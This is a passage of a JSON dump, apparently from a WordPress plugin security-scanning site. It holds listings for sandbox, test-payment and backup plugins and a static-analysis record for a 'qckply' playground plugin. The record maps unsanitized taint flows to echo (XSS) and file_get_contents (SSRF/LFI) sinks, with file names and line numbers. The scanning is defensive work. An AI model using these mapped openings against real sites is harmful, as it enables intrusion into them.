allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox\">\u003C\u002Fiframe>\u003C\u002Fspan>\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fyoutu.be\u002FoicwILzz0Yo?si=3ulohkktYtP4crDF\" rel=\"nofollow ugc\">YouTube video link…\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch3>Features of Pro Plugin:\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Able to create multiple Reset Points.\u003C\u002Fli>\n\u003Cli>Manual Demo Reset execution capability.\u003C\u002Fli>\n\u003Cli>Demo Reset Cycle automation via a regular URL.\u003C\u002Fli>\n\u003Cli>Demo Reset Cycle automation via a RESTful URL.\u003C\u002Fli>\n\u003Cli>Demo Reset Cycle automation via server Cron Jobs directly.\u003C\u002Fli>\n\u003Cli>The 
entire Database and Media Library can be reset to the selected Reset Point.\u003C\u002Fli>\n\u003Cli>Offers options to avoid forceful log out on logged-in users during the Reset process.\u003C\u002Fli>\n\u003Cli>Displays the Demo Reset Status (THAWED state or FROZEN state) on the WP Admin Bar.\u003C\u002Fli>\n\u003Cli>THAWED State Website Isolation capability to prevent unnecessary changes to the website.\u003C\u002Fli>\n\u003Cli>Capable of allowing users to upload new media files and trash already uploaded files in the FROZEN state. (Images, PDFs etc.)\u003C\u002Fli>\n\u003Cli>There will be no accumulation of abandoned files in the uploads directory because the Media Library will reset with every reset run.\u003C\u002Fli>\n\u003Cli>Plugins, Themes are WP Core auto updates are restricted, but can update manually in the THAWED state.\u003C\u002Fli>\n\u003Cli>Able to deploy Demo Websites for both Admin and Non-admin users. Only Admin who activate the Demo Reset plugin can access its setup features.\u003C\u002Fli>\n\u003Cli>Displays the Demo Reset Countdown Timer showing the time remaining for the next Reset.\u003C\u002Fli>\n\u003Cli>Shows the customizable Promo Bar at the top of the Demo Website on both admin and public sides.\u003C\u002Fli>\n\u003Cli>Options to display the Promo Bar on the admin side, public side, both, or hide it entirely.\u003C\u002Fli>\n\u003Cli>Features your Logo and Brand Name on the Promo Bar, linking your Business Website to the Demo site.\u003C\u002Fli>\n\u003Cli>Highlights your Special Offers or Promotions on the Promo Bar, linking your Landing Page to the Demo site.\u003C\u002Fli>\n\u003Cli>Capable of providing your Phone Number and Email Address for Demo users as Promo Bar Tools.\u003C\u002Fli>\n\u003Cli>Includes your Help Articles for Demo users as a Promo Bar tool.\u003C\u002Fli>\n\u003Cli>Able to add Extra Links for Demo users as a Promo Bar tool.\u003C\u002Fli>\n\u003Cli>Capable of sending an email notification at the end of each 
Reset Cycle.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>Demo Reset Documentation: \u003Ca href=\"https:\u002F\u002Fministryofplugins.com\u002Fdemo-reset-docs\" rel=\"nofollow ugc\">https:\u002F\u002Fministryofplugins.com\u002Fdemo-reset-docs\u003C\u002Fa>\u003C\u002Fp>\n","Let customers explore your Demo Websites beyond the frontend. Let them try as Editor, Author, Subscriber or Anyone—without risking permanent changes.",720,100,"2025-12-26T06:58:00.000Z","5.6","7.4",[18,91,19,92,21],"digital-store","sandbox","https:\u002F\u002Fministryofplugins.com\u002Fdemo-reset-docs\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdemo-reset.2.0.1.zip",{"slug":96,"name":97,"version":98,"author":99,"author_profile":100,"description":101,"short_description":102,"active_installs":103,"downloaded":104,"rating":86,"num_ratings":25,"last_updated":105,"tested_up_to":106,"requires_at_least":107,"requires_php":89,"tags":108,"homepage":111,"download_link":112,"security_score":86,"vuln_count":11,"unpatched_count":11,"last_vuln_date":34,"fetched_at":27},"sandbox-payment-gateway","Sandbox Payment Gateway for WooCommerce","1.0.4","webmonk","https:\u002F\u002Fprofiles.wordpress.org\u002Fwebmonk\u002F","\u003Cp>Sandbox Payment Gateway eliminates the need to create coupons or configure real payment gateways when testing your WooCommerce checkout. It provides two fake payment methods that simulate real checkout behavior without processing any actual payments.\u003C\u002Fp>\n\u003Ch4>Sandbox Credit Card\u003C\u002Fh4>\n\u003Cp>Accepts any valid credit card number with Luhn algorithm validation, expiry date checks, and CVV verification.\u003C\u002Fp>\n\u003Ch4>Sandbox ACH \u002F eCheck\u003C\u002Fh4>\n\u003Cp>Accepts check name, routing number (9 digits), and account number (4-17 digits). 
Successful payments are placed on-hold to simulate real-world eCheck verification.\u003C\u002Fp>\n\u003Ch4>Simulating a successful credit card transaction\u003C\u002Fh4>\n\u003Cp>Use any valid credit card details (e.g. card number 4111111111111111).\u003C\u002Fp>\n\u003Ch4>Simulating a failed credit card transaction\u003C\u002Fh4>\n\u003Cp>Use card number 4929000000022 with a valid expiry and CVV.\u003C\u002Fp>\n\u003Ch4>Simulating a successful eCheck transaction\u003C\u002Fh4>\n\u003Cp>Use any valid 9-digit routing number and 4-17 digit account number.\u003C\u002Fp>\n\u003Ch4>Simulating a failed eCheck transaction\u003C\u002Fh4>\n\u003Cp>Use routing number 000000000 with any valid account number.\u003C\u002Fp>\n\u003Ch4>Refunds\u003C\u002Fh4>\n\u003Cp>Both gateways support refunds from the WooCommerce admin order page. Since payments are simulated, refunds simply log a note on the order.\u003C\u002Fp>\n\u003Ch4>Development\u003C\u002Fh4>\n\u003Cp>The development of this plugin happens at \u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fwebmonk\u002Fsandbox-payment-gateway\" rel=\"nofollow ugc\">GitHub\u003C\u002Fa>.\u003C\u002Fp>\n\u003Cp>If you want to contribute, \u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fwebmonk\u002Fsandbox-payment-gateway\" rel=\"nofollow ugc\">fork the project\u003C\u002Fa> and send a pull request.\u003C\u002Fp>\n","Fake credit card and ACH\u002FeCheck payment gateways for testing WooCommerce checkout 
flows.",300,4207,"2026-03-22T02:21:00.000Z","6.8.5","4.7",[18,109,92,21,110],"payment-gateways","woocommerce","http:\u002F\u002Fcodemypain.com","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsandbox-payment-gateway.zip",{"slug":19,"name":114,"version":115,"author":116,"author_profile":117,"description":118,"short_description":119,"active_installs":120,"downloaded":121,"rating":122,"num_ratings":123,"last_updated":124,"tested_up_to":125,"requires_at_least":126,"requires_php":127,"tags":128,"homepage":129,"download_link":130,"security_score":131,"vuln_count":11,"unpatched_count":11,"last_vuln_date":34,"fetched_at":27},"Sandbox Site powered by Playground","0.1.8","Bero","https:\u002F\u002Fprofiles.wordpress.org\u002Fberislavgrgicak\u002F","\u003Cp>With this plugin, you can:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Create a copy of your site in a private WordPress Playground instance.\u003C\u002Fli>\n\u003Cli>Test plugins from the WordPress plugin directory without actually installing them on your site.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>Your site is cloned in Playground by copying all the files and a database into WordPress Playground. It may sound scary, but your data stays safely with you and is \u003Cstrong>not\u003C\u002Fstrong> uploaded to any cloud service. Instead, your site’s data is shipped directly to your web browser where it stays only as long as you keep your browser tab open. That’s right! 
WordPress Playground runs a copy of your site directly on your device.\u003C\u002Fp>\n\u003Ch3>Usage\u003C\u002Fh3>\n\u003Ch4>Starting a sandbox\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Open \u003Ccode>\u002Fwp-admin\u002F\u003C\u002Fcode> on your site\u003C\u002Fli>\n\u003Cli>Click on \u003Cem>Sandbox Site\u003C\u002Fem> in the \u003Cem>Tools\u003C\u002Fem> menu to load WordPress Playground with a copy of your site content\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Testing a plugin\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Open \u003Ccode>\u002Fwp-admin\u002F\u003C\u002Fcode> on your site\u003C\u002Fli>\n\u003Cli>Click on \u003Cem>Add Plugins\u003C\u002Fem> in the \u003Cem>Plugins\u003C\u002Fem> menu\u003C\u002Fli>\n\u003Cli>Find a plugin you want to test\u003C\u002Fli>\n\u003Cli>Click the \u003Cem>Preview Now\u003C\u002Fem> button\u003C\u002Fli>\n\u003Cli>The plugin will be installed and activated in WordPress Playground with a copy of your site content\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>All features\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Start a sandbox of your site\u003C\u002Fli>\n\u003Cli>Preview a plugin installation from the WordPress.org repository\u003C\u002Fli>\n\u003Cli>Export Playground snapshots using Tools > Export\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Resources\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fgithub.com\u002FWordPress\u002Fplayground-tools\u002Ftree\u002Ftrunk\u002Fpackages\u002Fplayground\" rel=\"nofollow ugc\">Source code\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fdeveloper.wordpress.org\u002Fplayground\" rel=\"nofollow ugc\">WordPress Playground\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fwordpress.github.io\u002Fwordpress-playground\u002F\" rel=\"nofollow ugc\">WordPress Playground repository\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Support\u003C\u002Fh3>\n\u003Cp>For any issues or questions about the WordPress Playground plugin, please open a 
GitHub issue in the \u003Ca href=\"https:\u002F\u002Fgithub.com\u002FWordPress\u002Fplayground-tools\" rel=\"nofollow ugc\">playground-tools\u003C\u002Fa> repository.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>This is an early preview to gather feedback and apply polish. This plugin isn’t yet a well-rounded and feature-complete solution.\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Ch3>License\u003C\u002Fh3>\n\u003Cp>The WordPress Playground Plugin is licensed under the GNU General Public License v2.0. This is a free software license that allows you to use, modify, and distribute the software, provided you adhere to its terms and conditions.\u003C\u002Fp>\n","Short description\n\nEnables running a sandbox of your site using WordPress Playground (https:\u002F\u002Fgithub.com\u002FWordPress\u002Fwordpress-playground)",40,5061,80,2,"2024-06-12T22:00:00.000Z","6.6.5","6.0","8.0",[19,92,20],"https:\u002F\u002Fgithub.com\u002FWordPress\u002Fplayground-tools\u002Ftree\u002Ftrunk\u002Fpackages\u002Fplayground","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fplayground.0.1.8.zip",92,{"slug":133,"name":134,"version":135,"author":136,"author_profile":137,"description":138,"short_description":139,"active_installs":11,"downloaded":140,"rating":11,"num_ratings":11,"last_updated":141,"tested_up_to":14,"requires_at_least":126,"requires_php":127,"tags":142,"homepage":145,"download_link":146,"security_score":86,"vuln_count":11,"unpatched_count":11,"last_vuln_date":34,"fetched_at":147},"diluted-test-order-for-woocommerce","Diluted Test Order for WooCommerce","1.0.0","Diluted","https:\u002F\u002Fprofiles.wordpress.org\u002Fdilutedplugins\u002F","\u003Cp>This plugin adds a WooCommerce payment method that completes checkout without a real payment provider. 
Orders are saved and marked paid like a normal purchase, only the payment is fake.\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Cstrong>Admin-only\u003C\u002Fstrong> – Only users who can \u003Ccode>manage_woocommerce\u003C\u002Fcode> (typically administrators and shop managers) see the method at checkout. Guests and customers never see it.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Paid immediately\u003C\u002Fstrong> – Orders complete as if payment succeeded. Stock updates, emails, and other post-payment behavior run as usual.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Works everywhere you check out\u003C\u002Fstrong> – Shortcode\u002Fclassic checkout and the Cart & Checkout blocks.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Usage\u003C\u002Fh3>\n\u003Col>\n\u003Cli>Sign in as a user with the \u003Cstrong>Shop manager\u003C\u002Fstrong> or \u003Cstrong>Administrator\u003C\u002Fstrong> role (or any role that includes \u003Ccode>manage_woocommerce\u003C\u002Fcode>).\u003C\u002Fli>\n\u003Cli>Add products to the cart and open checkout.\u003C\u002Fli>\n\u003Cli>Choose the test payment method in the checkout, the default label is \u003Cstrong>Test order (fake payment)\u003C\u002Fstrong> unless you changed it under the gateway settings.\u003C\u002Fli>\n\u003Cli>Place the order. You are redirected to the order received (thank-you) page; the order is recorded as paid.\u003C\u002Fli>\n\u003C\u002Fol>\n\u003Cp>You can customize the \u003Cstrong>Title\u003C\u002Fstrong> and \u003Cstrong>Description\u003C\u002Fstrong> shown at checkout under \u003Cstrong>WooCommerce \u003Cspan aria-hidden=\"true\" class=\"wp-exclude-emoji\">→\u003C\u002Fspan> Settings \u003Cspan aria-hidden=\"true\" class=\"wp-exclude-emoji\">→\u003C\u002Fspan> Payments \u003Cspan aria-hidden=\"true\" class=\"wp-exclude-emoji\">→\u003C\u002Fspan> Test order (admin only)\u003C\u002Fstrong>.\u003C\u002Fp>\n","Adds a fake payment method so you can test the full checkout flow without a real payment provider. 
Ideal for staging, QA and local development.",85,"2026-03-25T20:59:00.000Z",[143,144,20,21,110],"checkout","payment","https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fdiluted-test-order-for-woocommerce\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdiluted-test-order-for-woocommerce.1.0.0.zip","2026-04-06T09:54:40.288Z",{"slug":149,"name":150,"version":151,"author":152,"author_profile":153,"description":154,"short_description":155,"active_installs":156,"downloaded":157,"rating":158,"num_ratings":159,"last_updated":160,"tested_up_to":14,"requires_at_least":161,"requires_php":162,"tags":163,"homepage":16,"download_link":168,"security_score":169,"vuln_count":170,"unpatched_count":11,"last_vuln_date":171,"fetched_at":27},"wpvivid-backuprestore","WPvivid — Backup, Migration & Staging","0.9.125","wpvividplugins","https:\u002F\u002Fprofiles.wordpress.org\u002Fwpvividplugins\u002F","\u003Cp>WPvivid Backup & Migration Plugin offers backup, migration, and staging (create a staging site on a subdirectory to safely test WordPress, plugins, themes and website changes) as basic features.\u003C\u002Fp>\n\u003Ch3>WPvivid Backup & Migration for MainWP\u003C\u002Fh3>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fwpvivid-backup-mainwp\u002F\" rel=\"ugc\">WPvivid Backup & Migration for MainWP\u003C\u002Fa> is now available to download.\u003Cbr \u002F>\nWPvivid Backup & Migration for MainWP allows you to set up and control WPvivid Backup & Migration plugins for all child sites directly from your MainWP dashboard.\u003C\u002Fp>\n\u003Ch3>WPvivid Backup & Migration Pro is Now Available\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Customize everything to backup\u003C\u002Fli>\n\u003Cli>Create staging sites and push staging sites to live\u003C\u002Fli>\n\u003Cli>Incremental backups\u003C\u002Fli>\n\u003Cli>Database backup encryption\u003C\u002Fli>\n\u003Cli>Auto backup WordPress, themes, and plugins\u003C\u002Fli>\n\u003Cli>WordPress multisite 
backup\u003C\u002Fli>\n\u003Cli>WordPress multisite staging\u003C\u002Fli>\n\u003Cli>Create a fresh WP install\u003C\u002Fli>\n\u003Cli>Advanced remote backups\u003C\u002Fli>\n\u003Cli>Advanced backup schedules\u003C\u002Fli>\n\u003Cli>Restore remote backups\u003C\u002Fli>\n\u003Cli>Migrate a site via remote storage\u003C\u002Fli>\n\u003Cli>Migrate a childsite (MU) to a single WordPress install\u003C\u002Fli>\n\u003Cli>White label WPvivid Backup & Migration Pro\u003C\u002Fli>\n\u003Cli>Control user access to WPvivid Backup & Migration Pro\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fwpvivid.com\u002Fbackup-plugin-pro\" rel=\"nofollow ugc\">More amazing features\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>See a review video on WPvivid Backup & Migration Pro:\u003C\u002Fp>\n\u003Cp>\u003Cspan class=\"embed-youtube\" style=\"text-align:center; display: block;\">\u003Ciframe loading=\"lazy\" class=\"youtube-player\" width=\"750\" height=\"422\" src=\"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002FD1aYbayFpfU?version=3&rel=1&showsearch=0&showinfo=1&iv_load_policy=1&fs=1&hl=en-US&autohide=2&start=7&wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox\">\u003C\u002Fiframe>\u003C\u002Fspan>\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fwpvivid.com\u002Fpricing\" rel=\"nofollow ugc\">Get WPvivid Backup & Migration Pro\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch3>Core Features\u003C\u002Fh3>\n\u003Ch4>1. Easy Backups\u003C\u002Fh4>\n\u003Cp>Easily create a backup of your WordPress site. You can choose to backup the entire site(database+files), all files, or database only.\u003C\u002Fp>\n\u003Ch4>2. Auto Migration\u003C\u002Fh4>\n\u003Cp>Clone and migrate your WordPress site to a new domain with a single click. 
WPvivid Backup & Migration Plugin supports site migration from dev environment to a new server, from dev environment to a new domain or from a live server to another.\u003C\u002Fp>\n\u003Ch4>3. Create A Staging Site\u003C\u002Fh4>\n\u003Cp>Create a staging site on a subdirectory of your production site to safely test WordPress, plugins, themes and website changes. You can choose what to copy from the live site to the staging site.\u003C\u002Fp>\n\u003Ch4>4. Scheduled Backups\u003C\u002Fh4>\n\u003Cp>Set a schedule to run backups automatically on your website. You can set the backups to run every 12 hours, daily, weekly, fortnightly, monthly, choose backup items and destination.\u003C\u002Fp>\n\u003Ch4>5. Offsite Backup to Remote Storage\u003C\u002Fh4>\n\u003Cp>Send your backups offsite to a remote location. WPvivid Backup & Migration Plugin supports the leading cloud storage providers: Dropbox, Google Drive, Amazon S3, Microsoft OneDrive, DigitalOcean Spaces, FTP and SFTP.\u003C\u002Fp>\n\u003Ch4>6. One-Click Restore\u003C\u002Fh4>\n\u003Cp>Restore your WordPress site from a backup with a single click.\u003C\u002Fp>\n\u003Ch4>7. Cloud Storage Supported\u003C\u002Fh4>\n\u003Cp>WPvivid Backup & Migration plugin supports Dropbox, Google Drive, Microsoft OneDrive, Amazon S3, DigitalOcean Spaces, SFTP, FTP. WPvivid Backup & Migration Pro also supports Wasabi, pCloud, Backblaze, WebDav and more.\u003C\u002Fp>\n\u003Ch3>Minimum Requirements to use WPvivid Backup & Migration plugin\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Character Encoding UTF-8\u003C\u002Fli>\n\u003Cli>PHP version 5.3\u003C\u002Fli>\n\u003Cli>MySQL version 4.1\u003C\u002Fli>\n\u003Cli>WordPress 4.5\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>External Services\u003C\u002Fh3>\n\u003Cp>This plugin can optionally connect to third-party storage providers — Google Drive, Dropbox, Microsoft OneDrive, Amazon S3, DigitalOcean Spaces, and FTP\u002FSFTP servers — to store backup files. 
When remote storage is enabled, backup archives and required authentication tokens are sent to the selected service’s API. Use of these services is subject to their own terms and privacy policies.\u003C\u002Fp>\n","Migrate, staging, backup WordPress, all in one.",900000,16261440,98,1462,"2026-03-25T00:20:00.000Z","4.5","5.3",[164,165,166,167,20],"backup","clone","duplicate","migrate","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwpvivid-backuprestore.0.9.125.zip",75,26,"2026-02-10 17:13:35",{"attackSurface":173,"codeSignals":295,"taintFlows":347,"riskAssessment":609,"analyzedAt":618},{"hooks":174,"ajaxHandlers":285,"restRoutes":286,"shortcodes":287,"cronEvents":294,"entryPointCount":123,"unprotectedCount":11},[175,182,185,188,192,195,197,202,206,209,213,216,220,225,229,233,237,240,244,248,251,254,257,261,263,266,269,274,278,282],{"type":176,"name":177,"callback":178,"priority":179,"file":180,"line":181},"action","init","closure",999,"api.php",7,{"type":176,"name":183,"callback":178,"priority":179,"file":180,"line":184},"wp_loaded",15,{"type":176,"name":186,"callback":178,"file":180,"line":187},"rest_api_init",857,{"type":176,"name":189,"callback":190,"file":45,"line":191},"shutdown","qckply_sync_ids",38,{"type":176,"name":193,"callback":193,"file":194,"line":123},"qckply_clone_pro_form","client.php",{"type":176,"name":186,"callback":178,"file":48,"line":196},813,{"type":176,"name":198,"callback":199,"priority":200,"file":49,"line":201},"qckply_form_demo_content","qckply_form_demo_pro_content",10,4,{"type":176,"name":203,"callback":204,"priority":200,"file":49,"line":205},"qckply_form_steps","qckply_pro_form_steps",36,{"type":176,"name":207,"callback":207,"file":49,"line":208},"qckply_sideload_saved_image",229,{"type":176,"name":210,"callback":211,"file":212,"line":201},"wp_footer","qckply_clone_footer_message","filters.php",{"type":176,"name":214,"callback":211,"file":212,"line":215},"admin_footer",5,{"type":217,"name":218,"callback":218,"file":212,"li
ne":219},"filter","qckply_key_message",30,{"type":176,"name":221,"callback":222,"file":223,"line":224},"plugins_loaded","quickplayground_expro_includes","includes.php",18,{"type":176,"name":226,"callback":227,"file":223,"line":228},"admin_notices","quickplayground_expro_notice",44,{"type":176,"name":177,"callback":230,"file":231,"line":232},"qckply_qckply_block_init","qckply\u002Fqckply.php",46,{"type":176,"name":177,"callback":234,"file":235,"line":236},"qckply_iframe","qckply-iframe.php",35,{"type":176,"name":177,"callback":238,"file":239,"line":201},"qckply_loading","qckply-loading.php",{"type":176,"name":241,"callback":242,"file":51,"line":243},"admin_enqueue_scripts","qckply_enqueue_admin_script",149,{"type":176,"name":245,"callback":246,"file":51,"line":247},"wp_enqueue_scripts","qckply_enqueue_script",150,{"type":176,"name":177,"callback":249,"file":250,"line":54},"qckply_update_tracking","quickplayground-updates.php",{"type":176,"name":252,"callback":253,"priority":200,"file":250,"line":181},"wp_after_insert_post","qckply_post_updated",{"type":176,"name":255,"callback":253,"priority":200,"file":250,"line":256},"post_updated",8,{"type":176,"name":258,"callback":259,"file":250,"line":260},"updated_option","qckply_updated_option",9,{"type":176,"name":262,"callback":259,"file":250,"line":200},"added_option",{"type":176,"name":264,"callback":265,"priority":200,"file":250,"line":70},"added_post_meta","qckply_updated_postmeta",{"type":176,"name":267,"callback":265,"priority":200,"file":250,"line":268},"updated_postmeta",12,{"type":176,"name":270,"callback":271,"priority":272,"file":273,"line":219},"admin_bar_menu","qckply_toolbar_link",50,"utility.php",{"type":176,"name":275,"callback":276,"file":273,"line":277},"admin_menu","qckply_design_qckply_menus",113,{"type":217,"name":279,"callback":280,"file":273,"line":281},"qckply_blueprint","qckply_fix_variables",783,{"type":217,"name":283,"callback":178,"priority":200,"file":273,"line":284},"wp_calculate_image_srcset",
1271,[],[],[288,290],{"tag":289,"callback":289,"file":235,"line":201},"qckply_iframe_shortcode",{"tag":291,"callback":292,"file":51,"line":293},"qckply_button","qckply_get_button_shortcode",199,[],{"dangerousFunctions":296,"sqlUsage":302,"outputEscaping":305,"fileOperations":345,"externalRequests":200,"nonceChecks":307,"capabilityChecks":123,"bundledLibraries":346},[297],{"fn":298,"file":299,"line":300,"context":301},"move_uploaded_file","qckply_upload.php",23,"if(move_uploaded_file($_FILES[\"json_upload\"][\"tmp_name\"], $target_file))",{"prepared":303,"raw":11,"locations":304},69,[],{"escaped":306,"rawEcho":307,"locations":308},640,16,[309,312,314,317,320,321,323,325,327,329,332,334,336,339,341,343],{"file":180,"line":310,"context":311},248,"raw output",{"file":180,"line":313,"context":311},250,{"file":315,"line":316,"context":311},"blueprint-settings-init.php",132,{"file":318,"line":319,"context":311},"client-prompts.php",73,{"file":46,"line":170,"context":311},{"file":46,"line":322,"context":311},59,{"file":46,"line":324,"context":311},62,{"file":50,"line":326,"context":311},323,{"file":50,"line":328,"context":311},340,{"file":330,"line":331,"context":311},"key_pages.php",90,{"file":333,"line":260,"context":311},"qckply\u002Fsrc\u002Fqckply\u002Frender.php",{"file":299,"line":335,"context":311},32,{"file":337,"line":338,"context":311},"quickplayground_design_clone.php",45,{"file":273,"line":340,"context":311},317,{"file":273,"line":342,"context":311},337,{"file":273,"line":344,"context":311},1224,25,[],[348,384,399,408,416,431,444,459,470,480,488,508,522,537,548,557,565,575,585,598],{"entryPoint":349,"graph":350,"unsanitizedCount":123,"severity":383},"qckply_builder (blueprint-builder.php:7)",{"nodes":351,"edges":378},[352,358,362,367,370,373],{"id":353,"type":354,"label":355,"file":356,"line":357},"n0","source","$_REQUEST","blueprint-builder.php",27,{"id":359,"type":360,"label":361,"file":356,"line":357},"n1","transform","→ 
qckply_blueprint_settings_init()",{"id":363,"type":364,"label":365,"file":315,"line":316,"wp_function":366},"n2","sink","echo() [XSS]","echo",{"id":368,"type":354,"label":355,"file":356,"line":369},"n3",182,{"id":371,"type":360,"label":372,"file":356,"line":369},"n4","→ qckply_get_clone_posts()",{"id":374,"type":364,"label":375,"file":180,"line":376,"wp_function":377},"n5","file_get_contents() [SSRF\u002FLFI]",190,"file_get_contents",[379,380,381,382],{"from":353,"to":359,"sanitized":53},{"from":359,"to":363,"sanitized":53},{"from":368,"to":371,"sanitized":53},{"from":371,"to":374,"sanitized":53},"medium",{"entryPoint":385,"graph":386,"unsanitizedCount":123,"severity":383},"\u003Cblueprint-builder> (blueprint-builder.php:0)",{"nodes":387,"edges":394},[388,389,390,391,392,393],{"id":353,"type":354,"label":355,"file":356,"line":357},{"id":359,"type":360,"label":361,"file":356,"line":357},{"id":363,"type":364,"label":365,"file":315,"line":316,"wp_function":366},{"id":368,"type":354,"label":355,"file":356,"line":369},{"id":371,"type":360,"label":372,"file":356,"line":369},{"id":374,"type":364,"label":375,"file":180,"line":376,"wp_function":377},[395,396,397,398],{"from":353,"to":359,"sanitized":53},{"from":359,"to":363,"sanitized":53},{"from":368,"to":371,"sanitized":53},{"from":371,"to":374,"sanitized":53},{"entryPoint":400,"graph":401,"unsanitizedCount":25,"severity":383},"qckply_data (client-qckply_data.php:3)",{"nodes":402,"edges":406},[403,405],{"id":353,"type":354,"label":404,"file":45,"line":200},"$_POST['filename']",{"id":359,"type":364,"label":375,"file":45,"line":200,"wp_function":377},[407],{"from":353,"to":359,"sanitized":53},{"entryPoint":409,"graph":410,"unsanitizedCount":25,"severity":383},"\u003Cclient-qckply_data> 
(client-qckply_data.php:0)",{"nodes":411,"edges":414},[412,413],{"id":353,"type":354,"label":404,"file":45,"line":200},{"id":359,"type":364,"label":375,"file":45,"line":200,"wp_function":377},[415],{"from":353,"to":359,"sanitized":53},{"entryPoint":417,"graph":418,"unsanitizedCount":11,"severity":430},"qckply_blueprint_settings_init (blueprint-settings-init.php:9)",{"nodes":419,"edges":427},[420,423],{"id":353,"type":354,"label":421,"file":315,"line":422},"$_POST (x3)",22,{"id":359,"type":364,"label":424,"file":315,"line":425,"wp_function":426},"update_option() [Settings Manipulation]",49,"update_option",[428],{"from":353,"to":359,"sanitized":429},true,"low",{"entryPoint":432,"graph":433,"unsanitizedCount":11,"severity":430},"\u003Cblueprint-settings-init> (blueprint-settings-init.php:0)",{"nodes":434,"edges":441},[435,436,437,439],{"id":353,"type":354,"label":421,"file":315,"line":422},{"id":359,"type":364,"label":424,"file":315,"line":425,"wp_function":426},{"id":363,"type":354,"label":438,"file":315,"line":422},"$_POST (x2)",{"id":368,"type":364,"label":365,"file":315,"line":440,"wp_function":366},68,[442,443],{"from":353,"to":359,"sanitized":429},{"from":363,"to":368,"sanitized":429},{"entryPoint":445,"graph":446,"unsanitizedCount":11,"severity":430},"qckply_clone_prompts (client-prompts.php:3)",{"nodes":447,"edges":456},[448,451,452,455],{"id":353,"type":354,"label":449,"file":318,"line":450},"$_POST['show']",19,{"id":359,"type":364,"label":424,"file":318,"line":450,"wp_function":426},{"id":363,"type":354,"label":453,"file":318,"line":454},"$_GET",58,{"id":368,"type":364,"label":365,"file":318,"line":319,"wp_function":366},[457,458],{"from":353,"to":359,"sanitized":429},{"from":363,"to":368,"sanitized":429},{"entryPoint":460,"graph":461,"unsanitizedCount":11,"severity":430},"\u003Cclient-prompts> 
(client-prompts.php:0)",{"nodes":462,"edges":467},[463,464,465,466],{"id":353,"type":354,"label":449,"file":318,"line":450},{"id":359,"type":364,"label":424,"file":318,"line":450,"wp_function":426},{"id":363,"type":354,"label":453,"file":318,"line":454},{"id":368,"type":364,"label":365,"file":318,"line":319,"wp_function":366},[468,469],{"from":353,"to":359,"sanitized":429},{"from":363,"to":368,"sanitized":429},{"entryPoint":471,"graph":472,"unsanitizedCount":11,"severity":430},"qckply_sync_code_form (client-save-playground.php:318)",{"nodes":473,"edges":478},[474,477],{"id":353,"type":354,"label":475,"file":47,"line":476},"$_POST",336,{"id":359,"type":364,"label":424,"file":47,"line":342,"wp_function":426},[479],{"from":353,"to":359,"sanitized":429},{"entryPoint":481,"graph":482,"unsanitizedCount":11,"severity":430},"\u003Cclient-save-playground> (client-save-playground.php:0)",{"nodes":483,"edges":486},[484,485],{"id":353,"type":354,"label":475,"file":47,"line":476},{"id":359,"type":364,"label":424,"file":47,"line":342,"wp_function":426},[487],{"from":353,"to":359,"sanitized":429},{"entryPoint":489,"graph":490,"unsanitizedCount":11,"severity":430},"qckply_sync (expro-quickplayground-sync.php:8)",{"nodes":491,"edges":504},[492,495,497,499,501,502],{"id":353,"type":354,"label":493,"file":50,"line":494},"$_REQUEST (x2)",53,{"id":359,"type":364,"label":375,"file":50,"line":496,"wp_function":377},79,{"id":363,"type":354,"label":475,"file":50,"line":498},89,{"id":368,"type":364,"label":424,"file":50,"line":500,"wp_function":426},97,{"id":371,"type":354,"label":475,"file":50,"line":498},{"id":374,"type":364,"label":365,"file":50,"line":503,"wp_function":366},102,[505,506,507],{"from":353,"to":359,"sanitized":429},{"from":363,"to":368,"sanitized":429},{"from":371,"to":374,"sanitized":429},{"entryPoint":509,"graph":510,"unsanitizedCount":11,"severity":430},"\u003Cexpro-quickplayground-sync> 
